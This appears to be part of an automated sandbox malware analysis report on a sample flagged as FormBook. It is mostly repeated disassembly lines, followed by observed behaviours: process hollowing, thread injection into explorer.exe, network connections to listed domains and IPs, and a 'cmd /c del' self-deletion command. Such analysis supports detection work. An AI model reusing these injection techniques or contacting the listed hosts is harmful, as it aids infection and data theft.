          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BFE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BBA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BCFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B35210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BFEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.middreampostal.com
          Source: C:\Windows\explorer.exe | Domain query: www.purpleqube.com
          Source: C:\Windows\explorer.exe | Network Connect: 119.81.95.146 80
          Source: C:\Windows\explorer.exe | Domain query: www.bancambios.network
          Source: C:\Windows\explorer.exe | Domain query: www.xn---yado-8e4dze0c.site
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Network Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exe | Domain query: www.oceancollaborative.com
          Source: C:\Windows\explorer.exe | Network Connect: 184.175.83.64 80
          Source: C:\Windows\explorer.exe | Network Connect: 185.224.138.83 80
          Source: C:\Windows\explorer.exe | Domain query: www.thechandeck.com
          Source: C:\Windows\explorer.exe | Network Connect: 154.215.150.183 80
          Source: C:\Windows\explorer.exe | Domain query: www.bluebeltpanobuy.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Section loaded: unknown target: C:\Users\user\Desktop\5t2CmTUhKc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Thread register set: target process: 3440
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\help.exe | Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Section unmapped: C:\Windows\SysWOW64\help.exe base address: 13B0000
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Process created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          Yara detected FormBook
